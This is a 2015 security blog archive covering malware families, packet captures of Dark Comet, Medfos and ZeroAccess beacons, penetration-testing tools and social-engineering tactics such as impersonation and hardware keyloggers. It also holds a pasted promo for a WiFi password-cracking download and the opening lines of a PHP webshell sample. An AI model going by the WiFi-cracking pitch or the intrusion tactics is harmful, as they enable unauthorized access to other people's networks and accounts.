Monthly Archives: November 2015

What is Malware? What are some Malware Families and Variants?

Kinda ironic, I like to ask candidates while I am doing a job interview “What is Malware?” and what is it an amalgamation of?

I get responses like “It is a type of virus that gets on your computer” or “It is a backdoor that a hacker installs”

Even funnier is that about half of these educated and certification heavy professionals don’t know that malware is the combination of “Malicious” and “Software”

The interview for them is just about over at this point….

Anyway, here is a brief run down of how malware finds its way onto hosts, some malware families and specific brands and variants within the families.

 

Malware vs Exploit Kits

This is something that should not have to be explained to a cyber security professional, yet I keep having to do it.

Exploit kits are not malware! You cannot get infected with an exploit kit! Maybe 5% of the professionals I interview understand that concept – keep in mind these are people with years of “experience” expecting six figure jobs.

A web-based exploit kit is hosted on a webserver, either on malicious infrastructure or a hacked website. A common means of deploying exploit kit redirects is to hack a forum or wordpress/joomla site with out of date plugins allowing an attacker to inject code via XSS or SQLi from which they insert a malicious iframe redirect.

The initial redirect is made up of simple HTML, javascript, php, etc which is known as a landing page, basically like you visiting your favorite site blah.com which is really blah.com/index.html or blah.com/index.php but you get the point.

There are many different exploit kits in the wild, the most prevalent for 2016 is Angler Exploit kit, Nuclear Exploit, RIG and Neutrino with some other stragglers out there. There methodology is the same, the differences are in how the exploit kit processes and what the exploit kit is packing. Some exploit kits will pack exploits for various Java, Flash, PDF, Silverlight and Internet Explorer vulnerabilities. Some exploit kits will make a GET request for each of those plugins to determine which version of the software is on your machine, if it runs through all of its checks and the exploit kit does not have an exploit for the versions of the plugins it checked on it the exploit kit will quit and not even attempt exploitation to keep security analyst from analyzing their exploit kit. Other exploit kits will target one type of vulnerability, for instance Angler Exploit kit for most of 2015 targeted just the latest Flash vulnerabilities.

Exploit kits are sneaky, typically a valid referrer is required in the HTTP header for the exploit kit to begin its process, once again to prevent security analyst from getting a free look at their payload from the comfort and safety of a Virtual Machine. Once a vulnerable plugin is detected the exploit kit will send one or more exploits obfuscated to the victim in a GET request, if the exploit is successful the exploit kit will typically make the victim download a malicious payload (the malware). If the exploit kit is not successful it will typically give up and the process is over, HOWEVER there is the off chance that the exploit kit will rely on social engineering and attempt to prompt the potential victim with a download request in the form of a simple pop up window to the victim which if downloaded and run will have the same affect and the potential victim is now a victim. Social engineering from the exploit kit is rarely seen, I have observed it several times when an exploit kit is trying to exploit a patched plugin having no chance of successfully exploiting it, but having redirected a user to the kit deciding in a last ditch effort feeding them a drive-by-download if you will.

 

Brief Overview of Malware Families

Malware families are specific types of malware that have a shared method of behaviors once infecting a host.

Ransomware Family – you may have heard of this type of malware in the news lately, the Angler Exploit kit has delivered several different types of Ransomware to its victims over the last year. Ransomware is a type of malware that once on a host will typically encrypt the contents of the users hard drive (some offspring only bluff at this) and hold the users data literally for ransom. Ransomware became prevalent in 2012, one of the first variants was known as Reveton fraudulently claiming that the user must pay a fine to the Metropolitan Police Service:

Since Reveton there have been loads of variants popping up with evolved encryption techniques and various means for accepting payment to release the victims data. Some popular flavors of Ransomware include TeslaCrypt, AlphaCrypt, CryptoWall and CryptoLocker.

 

 

 

Click Fraud & Click Hijacking Family – For most of 2015 the Click Fraud family has been the most prevalent and successful, Click Jacking has diminished a bit, this is the process of allowing a victim to type in a search query into the search bar or their favorite search engine and stealing the keywords used for the search to redirect the victim to a custom search page that the hostile actors have an account with and get paid when the victim clicks links from the search. Most click fraud malware will hijack the victims browser start page to be one that they get paid when a user clicks links within and also open pop up windows, pop under windows and customized search pages. Click jacking targeted Google Adsense mainly in its infancy, it would use the victims search query as a crafted referrer to automatically click links after the search. Google is very smart and soon caught on to this scheme and behavior but not before millions of dollars were collected by hostile crimeware families.

A few examples of popular malware botnets performing these actions are Zero Access (one of its plugins), TDSS, Bedep

 

Pay-Per-Install / Pay-Per-Action / Adware Families – Some types of malware are very hard to isolate and separate from typical adware and toolbars that are usually more of a nuisance than anything else.

Two popular types of this malware are Mevade and Asprox/Kuluoz; Mevade has very little communication with its command and control server, once installed on a victim host it will act more as adware than malware. Mevade will download and install shady PC optimizer software and other software for which it earns anywhere from $1 to $5 per install. Mevade sprung up in early 2014 and hit with fury infecting several hundred thousand hosts through spam e-mail campaigns and within a few months they vanished with their small and quick fortune estimated to be just under one million dollars.

Another popular one is Kuluoz/Asprox which issues commands that instruct compromised computers to download and execute additional payloads provided by a pay-per-install (PPI) affiliate, from which botnet operators earn revenue. Unlike Mevade the crimeware bosses behind it were very greedy, they delivered their malware through spam e-mails, typically using subject lines like “Your Fedex tracking information” or “UPS Shipment Information” which surprisingly had a very high infection rate. Kuluoz had a very nice run, they started in 2013 and kept on pushing their malware until early 2015 when the FBI finally got their claws on them with assistance from international agencies. The group has been reported to make in excess of $100,000 over their duration.

 

Bitcoin/Crypo-currency Mining – With Bitcoin, miners use special software to solve math problems and are issued a certain number of bitcoins in exchange. This provides a smart way to issue the currency and also creates an incentive for more people to mine. Mining is the process of adding transaction records to Bitcoin’s public ledger of past transactions. This ledger of past transactions is called the block chain as it is a chain of blocks. The block chain serves to confirm transactions to the rest of the network as having taken place. Bitcoin nodes use the block chain to distinguish legitimate Bitcoin transactions from attempts to re-spend coins that have already been spent elsewhere.

Malware writers realized that it was easier to create a botnet of compromised hosts and use their GPU’s to perform bitcoin mining instead of investing money in infrastructure to do it themselves. In the early years of bitcoin mining it was a lot easier to earn coins but the market became saturated and more and more resources were required to generate substantial revenue.

One of the most prevalent and sucessful malware to employee bitcoin mining as its primary source of income was the Zero Access / Sirefef botnet which utilized a peer-to-peer network of a list of 128 hardcoded IPs of other infected systems with a master node hidden within the list which fed to a supernode making it very hard to track down the criminals behind this enterprise. After a few years of tremendous success law enforcement was able to shut down the botnet and make several arrests. All told the Zero Access masterminds reportedly generated over $100,000,000 in revenue!

 

Banking Trojans – Banking trojans are timeless and we may never truly put an end to them as they are big money and hard to trace. Once a victim is infected banking trojans install a keylogger that sits and waits for a victim to browse one of the prepopulated list of banks the malware tracks. An unsuspecting user will login to their bank account over port 443 using SSL thinking that their login and password are secured by encryption, they are correct assuming that nobody will be able to sniff their password crossing the wire, however keyloggers are not concerned with defeating encryption. The keylogger or keystroke logger will capture every key the user presses on the keyboard which would include the victim typing in the web address of their bank followed by their login name and password. Basically, it is game over for the victim, their only chance is to immediately remove the malware and change their passwords. The crimeware group will use the banking information to login to the victims bank account and use bank to bank transfers, western union, cashiers checks and other means to initially within sums of cash from the victims bank account. After they have pulled the money into a shell account they typically spread it around and launder the money so when the crimeware group goes to withdraw it the money has passed through so many intermediaries it is essentially untraceable.

Banking trojans are known to be region specific, meaning that they might only target victims that live in Mexico where they know they can easily withdraw the money because they have people on the ground there acting as mules. Banking trojans have also been observed transferring money into bitcoins making them virtually untraceable as well.

There have been so many variants, ZeuS/Zbot/Gameover ZeuS was one of the first big time banking trojans to hit the world, they hit the world hard and over time some have considered them to be the most successful and profitable malware campaigns of all time raking in a reported $500,000,000 between the various variants. The source code for this malware was leaked and a multitude of ZeuS variants have sporadically popped up all over the world. Other big time banking trojans include Oddjob, SpyEye, Geodo ebanking Trojan, Dyreza, Dridex, Dyre and Emotet.

Currently, the most active threats are VawTrak, Dridex and Dyre, they use specially crafted self-signed SSL certificates making their communication difficult to decipher. Dridex uses a different self signed certificate in each campaign making it virtually impossible to write snort rules for.

 

Trojan Downloaders – This should be axiomatic looking at the name, trojan downloaders are small pieces of malware that hostile actors like to install once they have compromised a victim because they can be easily re-written to avoid detection and their small size and requirements for installation are virtually none they sneak onto systems at a higher rate than the average malware. The purpose of trojan downloaders is to load other malware and malicious software. One of the most prolific ones is the Pony Trojan Downloader, the detection ratio is always very low as the writers are always tweaking the code, this one has survived for years.

 

FakeAV – Once the most common form of malware and may hold the lead for revenue generated as a family as this type of threat has been around since the 2000’s and continues to this day. FakeAV is extremely hard to remove from an infected system as it embeds itself virtually everywhere it can, once again we recommend that you re-image any machine with FakeAV installed on it. After infection a victim may see what looks like legitimate Windows Defender pop-ups from the task bar, virtually any webpage a victim tries to visit is redirected to a flashing page warning the user that they have been infected with a very serious virus and they need to remove it immediately before it’s too late. I have heard it compared to ransomware and they do have some similarities, FakeAV wants you to purchase their anti-virus solution to remove the malware that it in fact installed on your system. If you pay for their software it may remove the threat, realistically it depends on the flavor of FakeAV that you have been infected with.

 

Internet Relay Chat (IRC) Botnets – This type of malware has become more of a thing of the past with the exception of hacked *nix and MacOS systems. An infected machine will connect to an IRC server that has been preloaded by the malware which will connect the victim to the server and join a specific channel that usually host the botnet controllers group of compromised victims. The connection to IRC happens in the background all without the victim knowing they are in a chat room. Typically the IRC channel that the bot joins requires a password to get in or the bot master has created his own IRC server to host the botnet which he can ACL out anyone who isn’t a bot or him. Once the victim is in the channel just about anything is possible, the botmaster can issue commands to download tools, malware or whatever desired. The botmaster can use them in DDoS attacks or load them up with bitcoin mining software, it is really at their disposal.

SDBot has been around since the mid 1990’s and it still exist today as the most common IRC backdoor trojan, the code is very simple and can be easily modified to bypass anti-virus solutions. Typically IRC botnets are only used for the most prized possessions of a botnet which are Linux/Solaris/BSD and other *nix based servers and usually used to DDoS members on IRC that the group has made enemies with or for sport.

 

DDoS Botnets – The name says it all, these are malware botnets just like the rest of the ones discussed with the difference being the primary focus of these botnets is Distributed Denial of Service (DDoS) attacks. Just like most of the monetary mechanisms used by botnet owners above, DDoS has actually become big business as well on the underground. You can visit a site like hackforums.net and there will be hundreds of ads posted for “stressers” and DDoS botnet leasing services. For as little as $5 you can take down a corporate network for an hour. The DDoS malware typically contains a UDP flooder, TCP reset flooder (stream), ICMP attacks, IGMP and various other protocols, they also can initiate Distributed Reflection Denial of Service (DrDoS) attacks to masquerade the botnet owners identity.

There have been countless DDoS botnets since 1995, the originals being Tribal Flood Network, Stachaelnet, MStream and Trinoo. These botnets were not automated like the ones of today, in the old days you would hack a *nix server and install the client side of the DDoS software on the host and control it with a master server. These were some of the most powerful botnets ever built, hacker groups would pool their shells and roots into one big collection and load them up for attack. These were not Windows boxes on slow cable modems but instead high performance computing at places like HUT.FI and TUT.FI bringing the fastest connections and uplinks in the world together to knock off any site, company or even country offline with OC248 power vs T3 if you were lucky.

DDoS botnets that are still active are the Dorkbot, YZF, Ferret and currently the most dangerous is the XOR Linux Botnet capable of delivering over 200+ GB/s bandwidth

 

Remote Access Trojans (RAT) – When used for administration of legit services it is usually referred to as a Remote Administration Tool, when used by hostile actors this type of malware is usually associated with APT threats and state sponsored activity. A RAT will allow the hostile actor a means to access the compromised host or server even if it is protected by layers of security and defense in depth. Originally they used what is known as a bindshell, this is when a command line shell is binded to a specific port, for instance I edit /etc/services and /etc/inetd.conf and I make a rootshell on port 4444 and call it test server in ineted and services, once I restart ineted I can remote into the machine by telneting to port 4444 or ssh in later iterations. Rarely were there firewalls in place to block this type of incoming traffic, the servers that had firewalls were usually host based and you could simply modify ipchains/iptables to open the port of your choosing allowing access.

Modern RATs use what is known as a reverse shell to spawn a connection, this means that the initial SYN packet would come from the compromised host within the protected network and would not typically be blocked. The hostile actor would run software such as netcat to listen for the incoming connection and spawn a shell on connect. RATs do not all work the same way, some use ICMP or IGMP knock back packets which look harmless but trigger the reverse shell connection, others create subdomains within the network if they can compromise the domain controllers, other types use the RAT software itself to interact with the compromised host. I have even seen RAT software install other remote administration tools such as Teamviewer which would give the hostile actors GUI access to a Windows machine compromised.

Some examples of RATs include Rammit, GhostNet and Palevo

 

FTP botnets – Formerly a popular choice for malware writers but has since lost a lot of traction, mainly because FTP is usually a more restricted protocol these days. FTP malware would search an infected host for password files, financial information, text documents, tax information, banking information, stored credit cards and other personally identifiable information or data of value for the hostile actors to resell on the black market or use for profit.

Some recent examples of these botnets are Reedum Point of Sale Infostealer, USteal and Ghost RAT variants

 

Spam Botnets – These botnets usually do not stand on their own, typically they are rolled into one of the above malware families and this is an extension or module. Spam botnets work by extracting all e-mails on a compromised host from Outlook databases and other e-mail client software user lists. The malware uses the infected server or hosts ability to send mail and starts spamming the client lists with links to the same malware or other malware, also spamming links to generate revenue from ad clicking and taking advantage of peoples trust in others by opening e-mail from friends that would be in the contact list making them very successful.

A few SPAM centric botnets active today are Chanitor and Sanny Daws

 

Possibly Unwanted Programs (PUPs) / Riskware – Basically everything discussed thus far falls into the category of “Malware” but there is another type of software that is commonly referred to as a “PUP” which basically means there is not enough information at this time to classify the software as malicious or innocuous. Usually more research is needed and reverse engineering of the software to determine its intentions. PUPs can go either way, turn out to be malware, legit or adware, or even something else mistakenly classified here. Detection of a PUP usually relies on Anomaly based detection. APT malware would be a good culprit to show up as a PUP as the purpose of an APT is to stay as low key as possible therefore Anti-Virus would have never seen it before but might be able to question the software’s intent depending on the quality of the vendor.
Share Button

You have Malware on your computer, yes YOU, bet me!

Throughout my years in the Cyber Security industry I have always found it odd that most security professionals seem to have a very little grasp of the types of malware found in the wild, how they work and how people get infected with malware.

A friend of mine who has been in the IT system admin world for the last ten years told me the other day that he has never installed any type of Anti-Virus on his system because he has a firewall up and he never visits any sites that would get him infected, a few other admin friends chimed in echoing his sentiments. As a Cyber Security Specialist I wanted to fall on the ground laughing. I asked him how long he had been using his Windows Vista machine for (Vista…*sigh* …when everyone is on Windows 10 by now) and he said for over 7 years. My first response, while laughing was…WHY??? and the response was that he had never had a reason to upgrade and he didn’t trust anything else yet…keep in mind it is 2016 here!

To make things interesting I pulled out a hundred dollar bill and bet him that I could find two different families of malware on his PC and I will give him two to one odds AND I will identify which types of malware are present without installing any type of Anti-Virus software on his computer. The arrogance in him was showing and sure enough we had a bet.

I told him to make sure all his programs and any other computers on the network were turned off. A few minutes later I configured his switch to send traffic to the spanning port which I was plugging into ready to sniff on.

So I began a dump…..after the first couple minutes of dumping:

2015-11-27 22:31:03.730224 IP 192.168.1.101.41347 > 193.0.200.131.35689: Flags [S], seq 179598799, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Wd@…W….e…….i
.u………v……………
2015-11-27 22:31:09.733831 IP 192.168.1.101.41347 > 193.0.200.131.35689: Flags [S], seq 179598799, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0Wl@…W….e…….i
.u…..p……………
2015-11-27 22:31:23.725572 IP 192.168.1.101.41348 > 193.0.200.131.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4W.@…W….e…….i.#hm……………………
2015-11-27 22:31:26.725388 IP 192.168.1.101.41348 > 193.0.200.131.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4W.@…W….e…….i.#hm……………………
2015-11-27 22:31:32.725971 IP 192.168.1.101.41348 > 193.0.200.131.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0W.@…W….e…….i.#hm….p……………
2015-11-27 22:31:46.729820 IP 192.168.1.101.41358 > 193.0.200.131.35689: Flags [S], seq 4171882909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X.@…W!…e…….i………….E…………..
2015-11-27 22:31:49.729546 IP 192.168.1.101.41358 > 193.0.200.131.35689: Flags [S], seq 4171882909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X”@…W….e…….i………….E…………..
2015-11-27 22:31:55.730140 IP 192.168.1.101.41358 > 193.0.200.131.35689: Flags [S], seq 4171882909, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0X?@…V….e…….i……..p…0N……….
2015-11-27 22:32:09.736312 IP 192.168.1.101.41359 > 193.0.200.131.35689: Flags [S], seq 2284060342, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X_@…V….e…….i.#……….o……………
2015-11-27 22:32:12.727663 IP 192.168.1.101.41359 > 193.0.200.131.35689: Flags [S], seq 2284060342, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Xc@…V….e…….i.#……….o……………
2015-11-27 22:32:18.729255 IP 192.168.1.101.41359 > 193.0.200.131.35689: Flags [S], seq 2284060342, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0Xv@…V….e…….i.#……p……………
2015-11-27 22:32:32.731983 IP 192.168.1.101.41360 > 193.0.200.131.35689: Flags [S], seq 1973507909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X.@…V….e…….iu.WE……..)……………
2015-11-27 22:32:35.731848 IP 192.168.1.101.41360 > 193.0.200.131.35689: Flags [S], seq 1973507909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X.@…V….e…….iu.WE……..)……………
2015-11-27 22:32:41.735398 IP 192.168.1.101.41360 > 193.0.200.131.35689: Flags [S], seq 1973507909, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0[%@…T….e…….iu.WE….p…=………..
2015-11-27 22:32:55.736266 IP 192.168.1.101.41372 > 193.0.200.131.35689: Flags [S], seq 3110503877, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4].@…QQ…e…….i.

 

One down…..this would be our old friend the Dark Comet RAT

https://malwr.com/analysis/YzAyY2IyMzZmMWE4NDA1NmFjZTRjMDdkNzMwYTllMGE/#network_hosts_tab

http://www.malwaretraffic.com/malware-network-traffic-pcap-samples/is-the-darkcomet-rat-group-even-around/

 

Within minutes after creating a BPF filter to clear out some noise I find an old OLD friend…..Medfos …

 

2015-11-27 22:35:02.091464 IP 192.168.1.101.57881 > 78.140.131.158.80: P 1896497444:1896497760(316) ack 1193820996 win 16425
E..d3.@.|..`..`.N……Pq
A$G(CDP.@)+~..GET /upload/fid=BwCbAAEAKsbVAgEGCAAAAAAAAAAAAAAAAAAAAAAYDQMVCwAAAPpy0x3iEW6SrLh0giZvmW85e0tRAAADsw-FBh4b__zvYZLojGKKVyfOAXf5SvUqxtUCeTc2PDw9fVdWUUZUQ1dbOTg-OALOkSInrtZWJwAgAAAAAQcAAAAHAAAANFYA HTTP/1.1
Host: megaupload[.]com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cache-Control: no-cache

 

Really? Make it easier please. Within a few more minutes – Malware from years ago – Medfos – *sigh* …pay me now?  Or do we check UDP traffic…maybe he has had enough…

References:
http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2FMedfos&NavToggle=True#tab=2
https://www.virustotal.com/en/file/59afa68d4ec0392eea49eea70acb2e4c066656591835074c9b11cb52be5904ec/analysis/

 

Tcpdump for UDP traffic….

2015-11-27 22:37:32.041641 IP 192.168.1.101.1059 > 180.254.253.254.16464: UDP, length 16
E..,.Q….{d
……..#@P..w..s..(…….A.|p..
2015-11-27 22:37:34.482056 IP 192.168.1.101.1059 > 135.254.253.254.16464: UDP, length 16
E..,.R…..c
……..#@P…..s..(…….A.|p..
2015-11-27 22:37:37.691018 IP 192.168.1.101.1059 > 115.254.253.254.16464: UDP, length 16
E..,.S…..b
…s….#@P…..s..(…….A.|p..
2015-11-27 22:37:38.689153 IP 192.168.1.101.1059 > 88.254.253.254.16464: UDP, length 16
E..,.T…..a
…X….#@P…..s..(…….A.|p..
2015-11-27 22:37:41.122077 IP 192.168.1.101.1059 > 87.254.253.254.16464: UDP, length 16
E..,.U…..`
…W….#@P…..s..(…….A.|p..
2015-11-27 22:37:42.434002 IP 192.168.1.101.1059 > 71.254.253.254.16464: UDP, length 16
E..,.V….._
…G….#@P…..s..(…….A.|p..
2015-11-27 22:37:47.302714 IP 192.168.1.101.1059 > 213.253.253.254.16464: UDP, length 16
E..,.W….Z_
……..#@P..V..s..(…….A.|p..
2015-11-27 22:37:48.302716 IP 192.168.1.101.1059 > 212.253.253.254.16464: UDP, length 16
E..,.X….[^
……..#@P..W..s..(…….A.|p..
2015-11-27 22:37:49.302683 IP 192.168.1.101.1059 > 201.253.253.254.16464: UDP, length 16
E..,.Y….f]
……..#@P..b..s..(…….A.|p..
2015-11-27 22:37:50.302728 IP 192.168.1.101.1059 > 190.253.253.254.16464: UDP, length 16
E..,.Z….q\
……..#@P..m..s..(…….A.|p..
2015-11-27 22:37:51.302739 IP 192.168.1.101.1059 > 184.253.253.254.16464: UDP, length 16
E..,.[….w[
……..#@P..s..s..(…….A.|p..
2015-11-27 22:37:52.302687 IP 192.168.1.101.1059 > 180.253.253.254.16464: UDP, length 16
E..,.\….{Z
……..#@P..w..s..(…….A.|p..
2015-11-27 22:37:53.302694 IP 192.168.1.101.1059 > 67.81.86.2.16464: UDP, length 16
E..,.]……
…CQV..#@P…..s..(…….A.|p..

 

The ever obvious, vintage malware at this point Zero Access which beacons over port 16464 (and others) UDP with a packet length of 16!

References…like we need any:

https://malwr.com/analysis/ZjU2NjBhNWZkNTUyNGU1Mjg1ZTRiYTVhZDFmOWI5ZjE/#network_hosts_tab

http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html

https://www.virustotal.com/en/file/39f6b8a8e0c6925a2ce10fa36c9ce4e4689855381c8a331d489a0f0e3f38eb47/analysis/#behavioural-info

 

 

How much malware is on your PC? The real lesson here is that EVERYONE needs to have a reliable anti-virus solution in place, it doesn’t matter if you don’t look at porn or download illegal bittorrents, malware is delievered through Exploit Kits….E-mail and a myriad of different ways. You could be browsing your favorite car forum, a hacker injects a malicous <iframe> through a XSS vulnerability and guess what….your owned.

Anti-Virus alone will not save you, the malware I deal with in the real world is found on enterprise systems with the latest dat files and signatures for AV, the crimeware writers change small things within their malware payload to defeat Anti-Virus daily but sooner or later if your getting the latest updates as they come out, eventually they will be located, even by the AV stragglers out there.

If malware is detected on your machine the safest bet is to just re-image the computer and get back on with your life, the malware detected could have already loaded additional malware your AV doesn’t detect. You could also be victim of an APT and if that is the case you better use those ninja skills to identify it through network traffic as AV will most likely be years away from detecting it….if at all.

 

 

Share Button

So you want a job as a penetration tester or web application tester?

Website Application Testing

In today’s world there are typically two main types of offensive security professionals; the first being website application testers which focus primarily on weaknesses in web server applications such as cross site scripting (XSS), SQL injection (SQLi) attacks, directory traversal attacks, directory brute forcing, unlinked content manipulation, authentication bypassing, brute forcing weak passwords and default passwords and configurations, cross site forgery request, HTTP injection and replay attacks.

Pursuing a career in this field will require you to master some great tools available to you. The first one is known as BurpSuite by Portswigger. There is a free and paid version

Burp Suite: Free version available for download at portswigger.net

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Burp Suite contains the following key components:

  • An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
  • An application-aware Spider, for crawling content and functionality.
  • An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
  • An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
  • A Repeater tool, for manipulating and resending individual requests.
  • A Sequencer tool, for testing the randomness of session tokens.
  • The ability to save your work and resume working later.
  • Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Sqlmap – Free download at sqlmap.org

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Havij – Free download at http://itsecteam.com/

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.
Havij is a tool used in SQL Injection. It allows for a hacker to scan and exploit sites that rely on SQL.
Havij’s GUI Havij has an easy to use GUI, pictured right, which can be used to hack into a site in a matter of seconds. Havij is seen as a Script Kiddie tool, because the user does not have to follow the regular steps on SQL injection. It is still, however, a useful tool that many hackers keep in their arsenal for quick attacks.

Nikto – Free download at https://github.com/sullo/nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

 

 

Find your Website Application Testing Jobs:

 

what where
job title, keywords or company
city, state or zip

 

Penetration Testing

True pen testing involves actually trying to exploit weaknesses and vulnerabilities in servers, networking infrastructure and workstations. Therefore, less companies and organizations actually employee these types of teams because attempting to exploit a server may result in the server crashing and having an operational impact on the business or organization.

If you look up job offerings for penetration testing you will typically see that they are offered on a contract basis, 6 – 12 months usually where you will be doing an assessment on a network and when finished you will move on to your next project.

I have spent many years on the penetration testing side, myself and one or two other friends would take on a contract charging about $250-$300 an hour. The contract would include the testing of all public facing assets and internal assets of the company/organization. The test was not limited to just information system testing but also the exploitation of people through social engineering.

Social engineering was always my favorite part, first I would order shirts on zazzle or cafepress that resembled those of the tech support at the location. If the company didn’t have any special identification I would still try and fake something close to what they would expect. This part of the test was to see how many different places I could enter within the organization, every place I could enter that was supposed to be restricted was a finding. The second part of the test was to see how many employees would grant me access to their workstations, I would typically say that we were doing an upgrade or their machine needed to be patched, etc. This is where I would find sticky notes with login and passwords (a finding) and if the contract allowed, I would install my favorite device which was a WiFi hardware keylogger:

Keyghost and Keelog both make great ones which I’ve used close to a hundred times never being detected. I recommend checking them out.

I would also harvest as many e-mails and employee names as I could, I would use them to make calls as tech support requesting passwords and system information. I would also send spear phishing e-mails using company logos, letterhead and signatures trying to entice employees to give up credentials.

In the old old days, around the late 90’s my team had access to the latest 0-day exploits and things were far less organized. We could break into any server we wanted without the victim having any chance.

 

Here are the tools you need to master now:

 

Metasploit – Free version http://www.rapid7.com/products/metasploit/

Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 900 different exploits for Windows, Unix/Linux and Mac OS X systems are included);
Optionally checking whether the intended target system is susceptible to the chosen exploit;
Choosing and configuring a payload (code that will be executed on the target system upon successful entry; for instance, a remote shell or a VNC server);
Choosing the encoding technique so that the intrusion-prevention system (IPS) ignores the encoded payload;
Executing the exploit.
This modular approach – allowing the combination of any exploit with any payload – is the major advantage of the Framework. It facilitates the tasks of attackers, exploit writers and payload writers.

Metasploit runs on Unix (including Linux and Mac OS X) and on Windows. The Metasploit Framework can be extended to use add-ons in multiple languages.

To choose an exploit and payload, some information about the target system is needed, such as operating system version and installed network services. This information can be gleaned with port scanning and OS fingerprinting tools such as Nmap. Vulnerability scanners such as Nexpose or Nessus can detect target system vulnerabilities. Metasploit can import vulnerability scan data and compare the identified vulnerabilities to existing exploit modules for accurate exploitation.

 

BeEF – The Browser Exploitation Framework Project – Free version https://github.com/beefproject/beef

The Browser Exploitation Framework (BeEF) is an open-source penetration testing tool used to test and exploit web application and browser-based vulnerabilities. BeEF provides the penetration tester with practical client side attack vectors. It leverages web application and browser vulnerabilities to assess the security of a target and carry out further intrusions. This project is developed for lawful research and penetration testing. In practice, like many information security tools, Beef is used for both legitimate and unauthorized activities.

BeEF hooks one or more web browsers as beachheads for the launching of directed command modules. Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors.

BeEF can be used to further exploit a cross site scripting (XSS) flaw in a web application. The XSS flaw allows an attacker to inject BeEF project Javascript code into the vulnerable web page. In BeEF terminology, the browser that has visited the vulnerable page is “hooked”. This injected code in the “hooked” browser then responds to commands from the BeEF server. The BeEF server is a Ruby on Rails application that communicates with the “hooked browser” through a web-based user interface. BeEF comes with the BackTrack and Kali Linux distributions.

BeEF can be extended both through the extension API, which allows changes to the way BeEF itself works, and through addition of modules, which add features with which to control “hooked” browsers.

How to Hack WiFi Password (WEP/WPA/WPA2)

An internet connection has become a basic necessity in our modern lives. Wireless hot-spots (commonly known as Wi-Fi) can be found everywhere! If you have a PC with a wireless network card, then you must have seen many networks around you. Sadly most of these networks are secured with a network security key. Have you ever wanted to use one of these networks? You must have desperately wanted to check your mail when you shifted to your new house. The hardest time in your life is when your internet connection is down. Hacking those Wi-Fi passwords is your answer to temporary internet access.

Now to hack a Wifi Password you must first know what type of encryption it uses for its passwords there are many different types such as: WEP (easiest to crack/hack), WPA and WPA2.

Luckily for you we developed a program that automates all the hacking procces, and the only thing you need to do is click buttons & wait.
How it works?

To make you fully understand the method how this program performs you would most likely need near few months very first to understand the fundamentals of programming. Right after that you would again require few years probably (depends on how fast learner you are) to completely understand the approach how it functions. But in short, it scans for available wireless networks in your range, it contacts them, after the contact is established, it receives packets, after the packets are received, it decrypts the packets, meaning it gets the password with tool built within our application. Some wireless networks can be hacked in few moments, some can take few minutes, or hardly ever hours. This depends on how victim’s password is made. Many which are difficult to hack are created of letters (uppercase + lowercase), numbers and special characters. Naturally, many of them are made just of letters, and can be hacked extremely quick.
What Security Type’s / Encryptions does the software hack?

The software can hack the following encryptions / security type’s:
– WEP
– WPA
– WPA2

Available for download at http://www.wifi-hacker.org/download.php

 

Penetration Testing Jobs:

what where
job title, keywords or company
city, state or zip
Share Button

PHP MySQL Webshell Backdoor File Sample

So, owning close to a 100 websites occasionally one gets hacked, and it just so happened that one of them was compromised the other day. The backdoor that I found on the server was a MySQL one. Here is a sample of the default MySQL webshell backdoor I found on my server.

I take no responsibility with anything that you do with the code, this is being presented for educational purposes only.

 

 

<?
/*
* MySQL Web Interface Version 0.8
* ——————————-
* Developed By SooMin Kim (smkim@popeye.snu.ac.kr)
* License : GNU Public License (GPL)
* Homepage : http://popeye.snu.ac.kr/~smkim/mysql
*/

$HOSTNAME = “localhost”;

function logon() {
